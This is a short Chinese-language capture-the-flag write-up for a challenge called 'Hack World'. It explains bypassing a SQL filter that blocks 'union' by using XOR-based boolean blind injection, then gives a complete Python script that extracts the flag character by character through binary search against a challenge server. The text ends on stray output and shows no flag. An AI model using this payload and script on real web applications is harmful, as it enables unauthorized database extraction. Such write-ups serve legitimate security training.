Hack World
进入后提示是sql注入,并且给了表和列名。进行fuzz测试,过滤了很多字符。
主要的union字符被过滤,但select,from没有被过滤。我们还发现id只有输入1,2时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。
所以可以进行布尔盲注读取数据。 id=0^(ascii(substr((select(flag)from(flag)),1,1))>1) 写脚本进行盲注
import requests
url = "http://37264524-68ca-4248-9566-848debbbf6fd.node3.buuoj.cn/index.php"
payload = {
"id" : ""
}
result = ""
for i in range(1,50):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.post(url,data=payload)
if "Hello" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)
得到结果:
Processed:
0.020, SQL:
9
